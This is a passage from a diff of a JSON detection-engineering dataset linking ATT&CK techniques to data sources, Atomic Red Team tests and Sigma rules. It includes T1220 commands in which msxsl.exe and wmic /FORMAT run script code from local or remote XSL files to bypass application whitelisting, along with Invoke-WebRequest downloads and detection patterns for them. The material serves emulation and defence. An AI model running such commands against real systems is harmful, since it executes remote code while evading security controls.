This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf", + "https://www.group-ib.com/blog/cobalt", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1220", + "command_list": [ + "#{msxsl_exe} PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml #{xslfile}\n", + 
"#{msxsl_exe} #{xmlfile} PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl\n", + "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe #{xmlfile} #{xslfile}\n", + "#{msxsl_exe} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml #{xslfile}\n", + "#{msxsl_exe} #{xmlfile} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\n", + "wmic process list /FORMAT:\"#{local_xsl_file}\"\n", + "wmic #{wmic_command} /FORMAT:\"PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl\"\n", + "wmic #{wmic_command} /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"\n", + "wmic process list /FORMAT:\"#{remote_xsl_file}\"\n", + "msxsl.exe", + "wmic.exeprocess|list|/FORMAT|.xsl", + "wmic.exeos|get|/FORMAT|.xsl" + ], + "commands": [ + { + "command": "#{msxsl_exe} PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} #{xmlfile} PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe #{xmlfile} #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} #{xmlfile} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic process list 
/FORMAT:\"#{local_xsl_file}\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic #{wmic_command} /FORMAT:\"PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic #{wmic_command} /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic process list /FORMAT:\"#{remote_xsl_file}\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "msxsl.exe", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + }, + { + "command": "wmic.exeprocess|list|/FORMAT|.xsl", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + }, + { + "command": "wmic.exeos|get|/FORMAT|.xsl", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1220", + "display_name": "XSL Script Processing", + "atomic_tests": [ + { + "name": "MSXSL Bypass using local files", + "auto_generated_guid": "ca23bfb2-023f-49c5-8802-e66997de462d", + "description": "Executes the code specified within a XSL script tag during XSL transformation using a local payload. \nRequires download of MSXSL. 
No longer available from Microsoft.\n(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) \nOpen Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xmlfile": { + "description": "Location of the test XML file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml" + }, + "xslfile": { + "description": "Location of the test XSL script file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl" + }, + "msxsl_exe": { + "description": "Location of the MSXSL executable.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "XML file must exist on disk at specified location (#{xmlfile})\n", + "prereq_command": "if (Test-Path #{xmlfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml\" -OutFile \"#{xmlfile}\"\n" + }, + { + "description": "XSL file must exist on disk at specified location (#{xslfile})\n", + "prereq_command": "if (Test-Path #{xslfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl\" -OutFile \"#{xslfile}\"\n" + }, + { + "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", + "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest 
\"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" + } + ], + "executor": { + "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", + "cleanup_command": "del #{msxsl_exe} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "MSXSL Bypass using remote files", + "auto_generated_guid": "a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985", + "description": "Executes the code specified within a XSL script tag during XSL transformation using a remote payload.\nRequires download of MSXSL.exe. No longer available from Microsoft.\n(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )\nOpen Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xmlfile": { + "description": "Remote location (URL) of the test XML file.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml" + }, + "xslfile": { + "description": "Remote location (URL) of the test XSL script file.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" + }, + "msxsl_exe": { + "description": "Location of the MSXSL executable.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", + "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" + } + ], + 
"executor": { + "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", + "cleanup_command": "del -Path #{msxsl_exe} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "WMIC bypass using local XSL file", + "auto_generated_guid": "1b237334-3e21-4a0c-8178-b8c996124988", + "description": "Executes the code specified within a XSL script using a local payload.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "wmic_command": { + "description": "WMI command to execute using wmic.exe", + "type": "String", + "default": "process list" + }, + "local_xsl_file": { + "description": "Location of the test XSL script file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "XSL file must exist on disk at specified location (#{local_xsl_file})\n", + "prereq_command": "if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl\" -OutFile \"#{local_xsl_file}\"\n" + } + ], + "executor": { + "command": "wmic #{wmic_command} /FORMAT:\"#{local_xsl_file}\"\n", + "name": "command_prompt" + } + }, + { + "name": "WMIC bypass using remote XSL file", + "auto_generated_guid": "7f5be499-33be-4129-a560-66021f379b9b", + "description": "Executes the code specified within a XSL script using a remote payload. 
Open Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_xsl_file": { + "description": "Remote location of an XSL payload.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + }, + "wmic_command": { + "description": "WMI command to execute using wmic.exe", + "type": "String", + "default": "process list" + } + }, + "executor": { + "command": "wmic #{wmic_command} /FORMAT:\"#{remote_xsl_file}\"\n", + "name": "command_prompt" + } + } + ] + }, + { + "name": "XSL Script Processing", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "msxsl.exe" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wmic.exe" + }, + "cmdline": { + "pattern": "process|list|/FORMAT|.xsl", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wmic.exe" + }, + "cmdline": { + "pattern": "os|get|/FORMAT|.xsl", + "op": "and" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "experimental", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": [ + { + "Image|endswith": "\\wmic.exe", + 
"CommandLine|contains": "/format" + }, + { + "Image|endswith": "\\msxsl.exe" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment", + "msxsl.exe is not installed by default so unlikely." + ], + "level": "medium", + "tags": [ + "attack.execution", + "attack.t1220" + ] + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format 
executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1221", + "command_list": [ + "start PathToAtomicsFolder\\T1221\\src\\Calculator.docx\n" + ], + "commands": [ + { + "command": "start PathToAtomicsFolder\\T1221\\src\\Calculator.docx\n", + "source": "atomics/T1221/T1221.yaml", + "name": "Atomic Red Team Test - Template Injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": 